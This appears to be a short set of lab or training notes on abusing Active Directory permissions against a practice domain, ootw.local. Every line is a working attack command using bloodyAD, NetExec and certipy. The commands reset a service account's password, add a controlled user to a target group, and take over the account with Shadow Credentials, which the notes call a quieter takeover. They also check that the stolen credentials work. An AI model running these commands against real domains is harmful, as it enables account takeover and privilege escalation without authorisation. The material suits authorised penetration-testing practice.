Set variables:
export DC=10.10.10.200
export DOMAIN=ootw.local
For a user target, reset the password:
bloodyAD -d $DOMAIN --host $DC -u ben.carter -p 'StudentPass2026!' set password svc_web 'WebReset2026!'
Validate:
nxc smb $DC -d $DOMAIN -u svc_web -p 'WebReset2026!'
nxc ldap $DC -d $DOMAIN -u svc_web -p 'WebReset2026!'
For a group target, add a controlled user:
bloodyAD -d $DOMAIN --host $DC -u ben.carter -p 'StudentPass2026!' add groupMember 'TARGET GROUP' alice.wright
For a quieter user takeover, use Shadow Credentials:
certipy shadow auto -u ben.carter@ootw.local -p 'StudentPass2026!' -account svc_web -dc-ip $DC
OOTW edge:
nxc ldap $DC -d $DOMAIN -u ben.carter -p 'StudentPass2026!'
bloodyAD -d $DOMAIN --host $DC -u ben.carter -p 'StudentPass2026!' get object svc_web